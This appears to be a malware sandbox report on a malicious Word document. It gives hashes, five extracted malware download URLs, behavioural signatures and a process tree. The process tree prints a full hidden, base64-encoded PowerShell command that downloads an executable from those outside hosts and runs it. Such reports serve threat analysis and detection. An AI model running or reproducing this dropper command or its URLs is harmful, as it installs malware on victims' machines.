Analysis
-
max time kernel
133s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 00:52
Behavioral task
behavioral1
Sample
d0aa4009261cd6a957ca054a533007972207d6a1b16452c9ccc164e886dd467c.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d0aa4009261cd6a957ca054a533007972207d6a1b16452c9ccc164e886dd467c.doc
Resource
win10v2004-20241007-en
General
-
Target
d0aa4009261cd6a957ca054a533007972207d6a1b16452c9ccc164e886dd467c.doc
-
Size
113KB
-
MD5
ed2b42212cd661d7495a079f56418d0c
-
SHA1
6c9e3473cd1bf4e8d4d4f41c111fe1fc8c0afa35
-
SHA256
d0aa4009261cd6a957ca054a533007972207d6a1b16452c9ccc164e886dd467c
-
SHA512
5370aa5a2d187b7fe870008e9a753d692583a14a719f20afe9ca37b0b3ba54fef7e86bb23937aba51e9857742e39c57dd5bd8b261f1c10b5e46cc03fae960f62
-
SSDEEP
1536:bw9kKPubsYwKjtrzu5rGBmRoHynvwMMITLxQOa5tzLEOTsPfxIdxrtgA:0+KgdzSrGYKyIwLx3a4OTsnxA9
Malware Config
Extracted
https://sinergica.es/wp-admin/wKzoXKb/
http://anselton.com/cgi-bin/vEmYPW/
http://megaone.ir/mukcrl/OljlRgz/
http://design.jmcnet.com/wp-includes/a2pp6-uvy09ezl-9235065556/
https://www.espacoestela.com/6l943im/cZlyyCT/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4244 216 Powershell.exe -
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exeflow pid process 24 4244 Powershell.exe 26 4244 Powershell.exe 29 4244 Powershell.exe 34 4244 Powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1184 WINWORD.EXE 1184 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exepid process 4244 Powershell.exe 4244 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4244 Powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1184 WINWORD.EXE 1184 WINWORD.EXE 1184 WINWORD.EXE 1184 WINWORD.EXE 1184 WINWORD.EXE 1184 WINWORD.EXE 1184 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 1184 wrote to memory of 4972 1184 WINWORD.EXE splwow64.exe PID 1184 wrote to memory of 4972 1184 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d0aa4009261cd6a957ca054a533007972207d6a1b16452c9ccc164e886dd467c.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABLAGwAbwB5AGwAZABzAHUAPQAnAE0AcwBiAGUAaQBnAGQAZAB2AGQAawBwAGoAJwA7ACQARQBvAHUAZgBjAHIAcgByAHMAaQAgAD0AIAAnADQANgAzACcAOwAkAFYAbQBqAHkAdgBrAGUAZABhAG0AegB0AD0AJwBVAHkAYwBoAGMAYgBlAHgAagBsAG8AbwAnADsAJABPAHQAdQBoAGsAeQBuAHIAZwB3AG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAbwB1AGYAYwByAHIAcgBzAGkAKwAnAC4AZQB4AGUAJwA7ACQAVAB1AGMAYwBoAHUAaQBnAGwAbAA9ACcATwB5AGUAdwBoAGsAagBjACcAOwAkAFMAeQBsAG0AYwBhAGcAaQBtAHoAcAA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAQgBjAGwASQBFAG4AVAA7ACQAQwB4AHYAYQBrAGYAbgBpAHAAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGkAbgBlAHIAZwBpAGMAYQAuAGUAcwAvAHcAcAAtAGEAZABtAGkAbgAvAHcASwB6AG8AWABLAGIALwAqAGgAdAB0AHAAOgAvAC8AYQBuAHMAZQBsAHQAbwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdgBFAG0AWQBQAFcALwAqAGgAdAB0AHAAOgAvAC8AbQBlAGcAYQBvAG4AZQAuAGkAcgAvAG0AdQBrAGMAcgBsAC8ATwBsAGoAbABSAGcAegAvACoAaAB0AHQAcAA6AC8ALwBkAGUAcwBpAGcAbgAuAGoAbQBjAG4AZQB0AC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBhADIAcABwADYALQB1AHYAeQAwADkAZQB6AGwALQA5ADIAMwA1ADAANgA1ADUANQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHMAcABhAGMAbwBlAHMAdABlAGwAYQAuAGMAbwBtAC8ANgBsADkANAAzAGkAbQAvAGMAWgBsAHkAeQBDAFQALwAnAC4AIgBzAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQATQBjAGoAcABuAHgAZAB5AGsAaAA9ACcASgBmAGsAdwBsAGEAawBvAG4AcgBnAGEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAawByAHEAZQBiAG4AYQBrAHcAeQBlACAAaQBuACAAJABDAHgAdgBhAGsAZgBuAGkAcAApAHsAdAByAHkAewAkAFMAeQBsAG0AYwBhAGcAaQBtAHoAcAAuACIARABvAHcAbgBgAEwATwBBAGQAZgBgAEkAbABFACIAKAAkAFUAawByAHEAZQBiAG4AYQBrAHcAeQBlACwAIAAkAE8AdAB1AGgAawB5AG4AcgBnAHcAbgApADsAJABUAG0AZQBkAGUAbABlAGgAaQA9ACcAUwBoAGsAZABuAGEAcwBlAHgAbwB5AGwAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABPAHQAdQBoAGsAeQBuAHIAZwB3AG4AKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAyADgANAA3ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQByAFQAIgAoACQATwB0AHUAaABrAHkAbgByAGcAdwBuACkAOwAkAFMAdQB5AHYAdgBqAGMAaABkAHEAPQAnAEMAbABuAGMAeABrAGQAcwBzACcAOwBiAHIAZQBhAGsAOwAkAFoAcgBvAHYAcAByAHYAYgB0AGUAPQAnAEoAaQBtAGYAagBxAHoAZwBtAHQAdABwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAYgBiAGkAaABxAHMAagB6AGUAPQAnAE0AcABpAHAAYQBjAGcAcwBkAHUAawAnAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444B
MD5ddffaac8235776cee15c87b28d903cdf
SHA11d1778b9e1b8860b583018160bc16c0814898389
SHA2563d116829e1e4c2886fd8c13679d93cf10f70384f03249eaec1e61e8964f99fc0
SHA51268113f387a718823468d0866fc72c57218d4e8c3ef0dec2baffa32a433495d4ef5e5c5c759a7c9651e68e3b72c352c18ccb15cf2e3b083056019e8dd95deeca3
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD5b14ae90c31ad889e6e16ca7eb01c96fc
SHA144ae19fa9ad9e481103b5d704d6be0d9145a8918
SHA256ab98c1d46d2935d26e69b3455fb212d4cabcb6b2e569005e6bab22b1046dc58c
SHA512b0e00f8cedbe8e3280685ee7e75afc87795b0646139b3e5d4cdb0eec645af061bd14ce9fd133b30c94300e8b07919e980a3f1bde54646efb4135def9cdc82680